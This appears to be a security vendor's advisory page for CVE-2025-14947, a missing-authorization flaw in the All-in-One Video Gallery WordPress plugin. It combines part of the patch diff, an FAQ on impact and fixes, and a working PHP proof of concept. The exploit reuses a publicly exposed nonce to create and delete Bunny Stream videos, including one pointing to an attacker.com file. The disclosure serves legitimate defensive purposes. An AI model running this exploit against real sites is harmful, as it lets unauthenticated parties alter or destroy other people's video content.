+		check_ajax_referer( 'aiovg_public_ajax_nonce', 'security' );

 		// Proceed safe
 		$response = array(
@@ -194,7 +194,7 @@
 	 * @since 3.6.1
 	 */
 	public function ajax_callback_toggle_dislikes() {
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+		check_ajax_referer( 'aiovg_public_ajax_nonce', 'security' );

 		// Proceed safe
 		$response = array(
--- a/all-in-one-video-gallery/public/public.php
+++ b/all-in-one-video-gallery/public/public.php
@@ -241,7 +241,7 @@
 		$likes_settings = aiovg_get_option( 'aiovg_likes_settings' );

 		$ajax_url   = admin_url( 'admin-ajax.php' );
-		$ajax_nonce = wp_create_nonce( 'aiovg_ajax_nonce' );
+		$ajax_nonce = wp_create_nonce( 'aiovg_public_ajax_nonce' );
 		$user_id    = get_current_user_id();

 		$scroll_to_top_offset = 20;
@@ -258,6 +258,31 @@
 		);

 		wp_register_script(
+			AIOVG_PLUGIN_SLUG . '-categories',
+			AIOVG_PLUGIN_URL . 'public/assets/js/categories.min.js',
+			array( 'jquery' ),
+			AIOVG_PLUGIN_VERSION,
+			array( 'strategy' => 'defer' )
+		);
+
+		wp_register_script(
+			AIOVG_PLUGIN_SLUG . '-search',
+			AIOVG_PLUGIN_URL . 'public/assets/js/search.min.js',
+			array( 'jquery' ),
+			AIOVG_PLUGIN_VERSION,
+			array( 'strategy' => 'defer' )
+		);
+
+		wp_localize_script(
+			AIOVG_PLUGIN_SLUG . '-search',
+			'aiovg_search',
+			array(
+				'ajax_url'   => $ajax_url,
+				'ajax_nonce' => $ajax_nonce
+			)
+		);
+
+		wp_register_script(
 			AIOVG_PLUGIN_SLUG . '-pagination',
 			AIOVG_PLUGIN_URL . 'public/assets/js/pagination.min.js',
 			array( 'jquery' ),
@@ -359,6 +384,22 @@
 		);

 		wp_register_script(
+			AIOVG_PLUGIN_SLUG . '-chapters',
+			AIOVG_PLUGIN_URL . 'public/assets/js/chapters.min.js',
+			array( 'jquery' ),
+			AIOVG_PLUGIN_VERSION,
+			array( 'strategy' => 'defer' )
+		);
+
+		wp_localize_script(
+			AIOVG_PLUGIN_SLUG . '-chapters',
+			'aiovg_chapters',
+			array(
+				'scroll_to_top_offset' => $scroll_to_top_offset
+			)
+		);
+
+		wp_register_script(
 			AIOVG_PLUGIN_SLUG . '-public',
 			AIOVG_PLUGIN_URL . 'public/assets/js/public.min.js',
 			array( 'jquery' ),
@@ -370,19 +411,79 @@
 			AIOVG_PLUGIN_SLUG . '-public',
 			'aiovg_public',
 			array(
-				'plugin_url'           => AIOVG_PLUGIN_URL,
-				'plugin_version'       => AIOVG_PLUGIN_VERSION,
-				'ajax_url'             => $ajax_url,
-				'ajax_nonce'           => $ajax_nonce,
-				'scroll_to_top_offset' => $scroll_to_top_offset,
-				'i18n'                 => array(
-					'no_tags_found' => __( 'No tags found', 'all-in-one-video-gallery' )
+				'plugin_url'             => AIOVG_PLUGIN_URL,
+				'plugin_version'         => AIOVG_PLUGIN_VERSION,
+				'user_id'                => $user_id,
+				'ajax_url'               => $ajax_url,
+				'ajax_nonce'             => $ajax_nonce,
+				'show_like_button'       => ( ! empty( $likes_settings['like_button'] ) ? 1 : 0 ),
+				'show_dislike_button'    => ( ! empty( $likes_settings['dislike_button'] ) ? 1 : 0 ),
+				'login_required_to_vote' => ( ! empty( $likes_settings['login_required_to_vote'] ) ? 1 : 0 ),
+				'scroll_to_top_offset'   => $scroll_to_top_offset,
+				'i18n'                   => array(
+					'now_playing'          => __( 'Now Playing', 'all-in-one-video-gallery' ),
+					'no_tags_found'        => __( 'No tags found', 'all-in-one-video-gallery' ),
+					'likes'                => __( 'Likes', 'all-in-one-video-gallery' ),
+					'dislikes'             => __( 'Dislikes', 'all-in-one-video-gallery' ),
+					'alert_login_required' => __( 'Sorry, you must login to vote.', 'all-in-one-video-gallery' )
 				)
 			)
 		);
 	}

 	/**
+	 * Enqueue frontend CSS and JavaScript files based on the "force_load_assets" setting.
+	 *
+	 * @since 4.7.0
+	 */
+	public function enqueue_assets() {
+		if ( is_admin() ) {
+			return;
+		}
+
+		$general_settings = aiovg_get_option( 'aiovg_general_settings' );
+		if ( ! isset( $general_settings['force_load_assets'] ) ) {
+			return;
+		}
+
+		// Styles
+		if ( isset( $general_settings['force_load_assets']['css'] ) ) {
+			wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-icons' );
+			wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );
+		}
+
+		// Scripts
+		if ( isset( $general_settings['force_load_assets']['js'] ) ) {
+			if ( is_singular( 'aiovg_videos' ) ) {
+				$player_settings = aiovg_get_option( 'aiovg_player_settings' );
+
+				if ( isset( $player_settings['controls']['chapters'] ) ) {
+					wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-chapters' );
+				}
+			}
+
+			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-public' );
+		}
+	}
+
+	/**
+	 * Enqueue Gutenberg block assets for backend editor.
+	 *
+	 * @since 3.6.1
+	 */
+	public function enqueue_block_editor_assets() {
+		// Styles
+		$this->register_styles();
+
+		wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );
+
+		// Scripts
+		$this->register_scripts();
+
+		wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-likes' );
+	}
+
+	/**
 	 * Set MySQL's RAND function seed value in a cookie.
 	 *
 	 * @since 3.9.3
@@ -410,23 +511,6 @@
 	}

 	/**
-	 * Enqueue Gutenberg block assets for backend editor.
-	 *
-	 * @since 3.6.1
-	 */
-	public function enqueue_block_editor_assets() {
-		// Styles
-		$this->register_styles();
-
-		wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );
-
-		// Scripts
-		$this->register_scripts();
-
-		wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-likes' );
-	}
-
-	/**
 	 * Flush rewrite rules when it's necessary.
 	 *
 	 * @since 1.0.0
@@ -967,7 +1051,7 @@
 	 * @since 1.0.0
 	 */
 	public function set_gdpr_cookie() {
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+		check_ajax_referer( 'aiovg_public_ajax_nonce', 'security' );
 		setcookie( 'aiovg_gdpr_consent', 1, time() + ( 86400 * 30 ), COOKIEPATH, COOKIE_DOMAIN );
 		wp_send_json_success();
 	}
--- a/all-in-one-video-gallery/public/search.php
+++ b/all-in-one-video-gallery/public/search.php
@@ -75,7 +75,7 @@
 		wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );

 		if ( empty( $attributes['has_search_button'] ) ) {
-			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-public' );
+			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-search' );
 		}

 		if ( ! empty( $attributes['has_category'] ) || ! empty( $attributes['has_tag'] ) ) {
--- a/all-in-one-video-gallery/public/templates/player-gdpr.php
+++ b/all-in-one-video-gallery/public/templates/player-gdpr.php
@@ -177,7 +177,7 @@
 				}
 			}

-			xmlhttp.open( 'POST', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_set_cookie&security=<?php echo wp_create_nonce( 'aiovg_ajax_nonce' ); ?>', true );
+			xmlhttp.open( 'POST', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_set_cookie&security=<?php echo wp_create_nonce( 'aiovg_public_ajax_nonce' ); ?>', true );
 			xmlhttp.setRequestHeader( 'Content-type', 'application/x-www-form-urlencoded' );
 			xmlhttp.send( 'action=aiovg_set_cookie' );
 		}
--- a/all-in-one-video-gallery/public/templates/player-iframe.php
+++ b/all-in-one-video-gallery/public/templates/player-iframe.php
@@ -284,7 +284,7 @@
                     }
                 }

-                xmlhttp.open( 'GET', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_update_views_count&post_id=<?php echo $post_id; ?>&security=<?php echo wp_create_nonce( 'aiovg_ajax_nonce' ); ?>', true );
+                xmlhttp.open( 'GET', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_update_views_count&post_id=<?php echo $post_id; ?>&security=<?php echo wp_create_nonce( 'aiovg_public_ajax_nonce' ); ?>', true );
                 xmlhttp.send();
             }

--- a/all-in-one-video-gallery/public/templates/player-videojs.php
+++ b/all-in-one-video-gallery/public/templates/player-videojs.php
@@ -1514,7 +1514,7 @@

 			var duration = player.duration() || 0;

-			xmlhttp.open( 'GET', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_update_views_count&post_id=<?php echo $post_id; ?>&duration=' + duration + '&security=<?php echo wp_create_nonce( 'aiovg_ajax_nonce' ); ?>', true );
+			xmlhttp.open( 'GET', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_update_views_count&post_id=<?php echo $post_id; ?>&duration=' + duration + '&security=<?php echo wp_create_nonce( 'aiovg_public_ajax_nonce' ); ?>', true );
 			xmlhttp.send();
 		}

--- a/all-in-one-video-gallery/public/templates/player-vidstack.php
+++ b/all-in-one-video-gallery/public/templates/player-vidstack.php
@@ -686,15 +686,15 @@
             text-decoration: none;
         }

-		/* Custom Theme */
-		.aiovg-player-theme-custom .plyr__control--overlaid {
+		.aiovg-player .plyr__control--overlaid {
 			--plyr-control-spacing: 15px;
 		}

-		.aiovg-player-theme-custom .plyr__control--overlaid svg {
+		.aiovg-player .plyr__control--overlaid svg {
 			--plyr-control-icon-size: 27px;
 		}

+		/* Custom Theme */
 		.aiovg-player-theme-custom .plyr__controls {
 			flex-wrap: wrap;
 			justify-content: flex-start;
@@ -1118,7 +1118,7 @@

 			var duration = player.duration || 0;

-			xmlhttp.open( 'GET', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_update_views_count&post_id=<?php echo $post_id; ?>&duration=' + duration + '&security=<?php echo wp_create_nonce( 'aiovg_ajax_nonce' ); ?>', true );
+			xmlhttp.open( 'GET', '<?php echo admin_url( 'admin-ajax.php' ); ?>?action=aiovg_update_views_count&post_id=<?php echo $post_id; ?>&duration=' + duration + '&security=<?php echo wp_create_nonce( 'aiovg_public_ajax_nonce' ); ?>', true );
 			xmlhttp.send();
 		}

--- a/all-in-one-video-gallery/public/video.php
+++ b/all-in-one-video-gallery/public/video.php
@@ -519,7 +519,7 @@
 			wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );

 			if ( isset( $player_settings['controls']['chapters'] ) ) {
-				wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-public' );
+				wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-chapters' );
 			}

 			// Process output
@@ -572,7 +572,7 @@
 			$post_id = (int) $_REQUEST['post_id'];

 			if ( $post_id > 0 ) {
-				check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+				check_ajax_referer( 'aiovg_public_ajax_nonce', 'security' );
 				aiovg_update_views_count( $post_id );

 				// Update video duration if applicable
--- a/all-in-one-video-gallery/public/videos.php
+++ b/all-in-one-video-gallery/public/videos.php
@@ -475,7 +475,7 @@
 	 */
 	public function ajax_callback_load_videos() {
 		// Security check
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+		check_ajax_referer( 'aiovg_public_ajax_nonce', 'security' );

 		// Proceed safe
 		$attributes = array();
--- a/all-in-one-video-gallery/widgets/categories.php
+++ b/all-in-one-video-gallery/widgets/categories.php
@@ -101,7 +101,7 @@
 		wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );

 		if ( 'dropdown' == $template ) {
-			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-public' );
+			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-categories' );
 		}

 		// Process output
--- a/all-in-one-video-gallery/widgets/search.php
+++ b/all-in-one-video-gallery/widgets/search.php
@@ -87,7 +87,7 @@
 		wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );

 		if ( empty( $attributes['has_search_button'] ) ) {
-			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-public' );
+			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-search' );
 		}

 		if ( ! empty( $attributes['has_category'] ) || ! empty( $attributes['has_tag'] ) ) {

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14947 - All-in-One Video Gallery <= 4.6.4 - Missing Authorization to Unauthenticated Bunny Stream Video Creation/Deletion

<?php
/**
 * Proof of Concept for CVE-2025-14947
 * Requires a valid nonce exposed in public player templates
 */

$target_url = 'https://vulnerable-site.com';
$nonce = 'EXPOSED_NONCE_HERE'; // Obtain from page source: aiovg_public.ajax_nonce

// Function to create Bunny Stream video
function create_bunny_stream_video($target_url, $nonce) {
    $ajax_url = $target_url . '/wp-admin/admin-ajax.php';
    
    $payload = [
        'action' => 'aiovg_create_bunny_stream_video',
        'security' => $nonce,
        'library_id' => '12345', // Target library ID
        'collection_id' => '67890', // Target collection ID
        'title' => 'Malicious Video',
        'mp4' => 'https://attacker.com/malicious.mp4'
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $ajax_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    echo "Create Video Response (HTTP $http_code):n";
    echo $response . "nn";
    return $response;
}

// Function to delete Bunny Stream video
function delete_bunny_stream_video($target_url, $nonce, $video_id) {
    $ajax_url = $target_url . '/wp-admin/admin-ajax.php';
    
    $payload = [
        'action' => 'aiovg_delete_bunny_stream_video',
        'security' => $nonce,
        'video_id' => $video_id
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $ajax_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    echo "Delete Video Response (HTTP $http_code):n";
    echo $response . "nn";
    return $response;
}

// Execute PoC
if (!empty($nonce) && $nonce !== 'EXPOSED_NONCE_HERE') {
    echo "Testing CVE-2025-14947 against: $target_urlnn";
    
    // Attempt to create a video
    echo "=== Attempting to create Bunny Stream video ===n";
    $create_response = create_bunny_stream_video($target_url, $nonce);
    
    // Parse video ID from response if successful
    $json_response = json_decode($create_response, true);
    if (isset($json_response['success']) && $json_response['success'] && isset($json_response['data']['videoId'])) {
        $video_id = $json_response['data']['videoId'];
        echo "Created video with ID: $video_idnn";
        
        // Attempt to delete the video
        echo "=== Attempting to delete Bunny Stream video ===n";
        delete_bunny_stream_video($target_url, $nonce, $video_id);
    }
} else {
    echo "Please set a valid nonce from the target site's page source.n";
    echo "Look for 'aiovg_public.ajax_nonce' in video player templates.n";
}

?>

Frequently Asked Questions

What is CVE-2025-14947?
Overview of the vulnerability
CVE-2025-14947 is a vulnerability in the All-in-One Video Gallery plugin for WordPress, affecting versions up to 4.6.4. It allows unauthenticated attackers to create and delete videos on the Bunny Stream CDN due to missing authorization checks in specific AJAX functions.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the registration of AJAX handlers without proper capability checks. Attackers can exploit this by obtaining a valid nonce, which is publicly exposed, and sending crafted requests to create or delete videos associated with a victim’s Bunny Stream account.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the All-in-One Video Gallery plugin version 4.6.4 or earlier is affected. Administrators should check their plugin version and update if necessary to ensure they are not vulnerable.
How can I check if I am affected?
Steps for verification
To check if you are affected, log into your WordPress admin panel, navigate to the Plugins section, and look for the All-in-One Video Gallery plugin. If the version is 4.6.4 or earlier, your site is vulnerable.
What should I do to fix this vulnerability?
Recommended actions
To mitigate this vulnerability, update the All-in-One Video Gallery plugin to version 4.7.1 or later, which includes security patches that address the missing authorization issue.
What does the CVSS score of 6.5 mean?
Understanding risk levels
A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could allow unauthorized access and manipulation of data.
What are the practical risks of this vulnerability?
Potential consequences
If exploited, this vulnerability allows attackers to create unauthorized videos, consuming storage and bandwidth, and delete existing videos, which can disrupt services and lead to data loss for the affected user.
How does the proof of concept demonstrate the issue?
Exploit example
The proof of concept shows how an attacker can exploit the vulnerability by using a valid nonce obtained from the public player templates. It illustrates how to send a crafted request to create a video on the Bunny Stream CDN, demonstrating the ease of exploitation.
What are nonce values and why are they important?
Role of nonce in WordPress security
Nonce values in WordPress are used to verify that a request to perform an action comes from a legitimate source. In this vulnerability, the nonce is exposed, allowing attackers to bypass security checks and perform unauthorized actions.
Are there any other security measures I should consider?
Additional recommendations
In addition to updating the plugin, consider implementing web application firewalls, regular security audits, and monitoring for unusual activity on your WordPress site to enhance overall security.
What if I cannot update the plugin immediately?
Interim mitigation strategies
If immediate updates are not possible, you can temporarily disable the All-in-One Video Gallery plugin to prevent exploitation until you can apply the necessary updates.
Where can I find more information about this vulnerability?
Resources for further reading
More information can be found on the official CVE database, security advisories from the plugin developers, and WordPress security forums that discuss vulnerabilities and their mitigations.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations